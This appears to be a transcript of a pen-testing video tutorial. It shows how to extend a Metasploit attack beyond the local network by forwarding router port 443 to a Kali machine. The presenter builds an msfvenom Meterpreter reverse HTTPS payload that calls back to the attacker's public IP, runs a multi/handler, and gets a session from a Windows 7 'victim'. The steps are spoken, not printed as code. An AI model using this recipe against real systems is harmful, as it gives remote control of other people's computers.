Hey, guys, what's up? Welcome to experience Tech. I'm beneath. And today's video is a long-overdue pen testing video. Now, one of the subscribers of X P s Tec channel commented on one of the videos that most pen testing tutorials show hacks over the local area network, or over LAN, which, of course, do not work over the wide area network. And he wanted to know how to pull off these hacks over the Internet. So in today's video we'll check out how to do your Metasploit hack over the Internet, or over the wide area network, by configuring a setting on your router called port forwarding. All right, so let's begin today's video.

All right. First of all, the reason why your LAN hacks do not work over the Internet is because the IP address that you see when you do ifconfig on your Linux machine or ipconfig on your Windows machine is a local IP address, which is given to your computer by your router. And it's not the public IP address that goes over the Internet. Now, there are several ways to find out your public IP address. The easiest one is to search "what's my IP" in Google, and that will give you your public IP address. Now, I cannot show you my entire IP address. However, for the purposes of demonstration, I'm just going to show you the first octet of my public IP address.

Now, in order to make our Metasploit LAN hack work over the Internet, we need to create a sort of bridge that will send all the traffic coming on to a specific port on the public IP address to a port on the private IP address. This is done by a setting on your router called port forwarding.

All right, so let me go to my home router page and show you how to do port forwarding. So it's 192.168.1.1. All right, I'm using a D-Link DSL-2730U router. You might be using some other router, so just look for these settings on your router page. In the D-Link router, under the Advanced tab, you have the setting for port forwarding. It's right here. Let me maximize this. All right.
The first option is to give the service name. There are some common service names that are listed here. You can even give your own user-defined service name. So I'm just gonna type in test. And the protocol: you can give UDP if you're doing a UDP hack, but I'm just going to leave it to TCP. All right. Next is the WAN setting. I'm just gonna leave it to Interface, and then the WAN interface is point-to-point protocol over Ethernet. I'm just gonna leave it as it is. Next is the WAN port. This is the port that we want to forward. So I'm just gonna give it 443, which is the HTTPS port. And next is the LAN open port, which is the port that will receive all the traffic from your WAN port. So I'm gonna type 443 here as well. Next is the LAN IP address. This is the local IP address of your Kali Linux machine. So I'm just gonna type in 192.168.1.6. All right.

All right. So that's about it. Now click on Add. Now, as you can see, the port forwarding table has our latest port forwarding entry. All right, so that was all that you need to configure on your router page.

All right, now, let's check if this works. Now, what I'm going to do now is I'm gonna create a simple, basic payload using msfvenom. And then I'm gonna transfer the malicious payload to a Windows 7 machine, which is gonna be our victim's machine. And then we're gonna run that malicious payload there and see if we get a Meterpreter shell back.

All right, so let's quickly create a very basic payload. To do that, type msfvenom, give a space, dash p. The payload that we're gonna use is Windows Meterpreter reverse HTTPS. And then LHOST is going to be our public IP address. So it's 117 dot blah blah blah, dot blah blah, and dot blah blah. All right. Next is the LPORT. Now, this is the port that we forwarded, which is 443. And then the file that we want to create is an EXE file.
And then the output. Next is the output directory where we want to save our payload. So I'm gonna save it in temp slash test dot exe. Now, press Enter. All right, so that successfully created our payload. Let's go to the temp directory and check if it is available there. So here we have our malicious file. Next is to transfer it to our victim's computer, which I have already done.

Now, let me go to the victim's machine, which is the Windows 7 box. And as you can see, I already have the test file copied to the desktop. Before I run this file, let's quickly start our reverse handler. So let's do msfconsole. All right, so let's use exploit multi handler. Show options. All right, let's set the payload as Windows Meterpreter reverse HTTPS. Options. All right, now let's set the LHOST as our public IP address. So it's gonna be 117 dot, dot, and dot. Press Enter. Set the LPORT as 443.

Okay, now one more setting that you need to do here is set the reverse listener bind address. This should be the local IP address, which is 192.168.1.6 in my case. What this will do is, Metasploit will not be able to bind to your public IP address, and then it'll fall back to the local IP address of your Kali Linux machine. All right, so now press Enter and then run exploit. All right, so now our reverse handler is ready for the connection.

Now, let's go to the victim's Windows 7 machine and run the payload. All right, so here I am on my Windows 7 computer. Now, before I run the test payload, let me show you the IP address, the public IP address, of this computer. So let's go to google.com and type in "what's my IP". As you can see, the public IP address of this computer starts from 182. Now let's run the payload and see if this works. All right. So as you can see on the Kali Linux box, we already have a Meterpreter session 1 opened, and we have the IP address.
And this is from IP address 182. So this is how you do your Meterpreter hack over the Internet using port forwarding.

All right, so that was all for today. Thank you guys for watching this. If you like this video, kindly press the Like button. If you have any comment or suggestion, please type that in the comment box. Thank you again for watching, and I'll see you next time.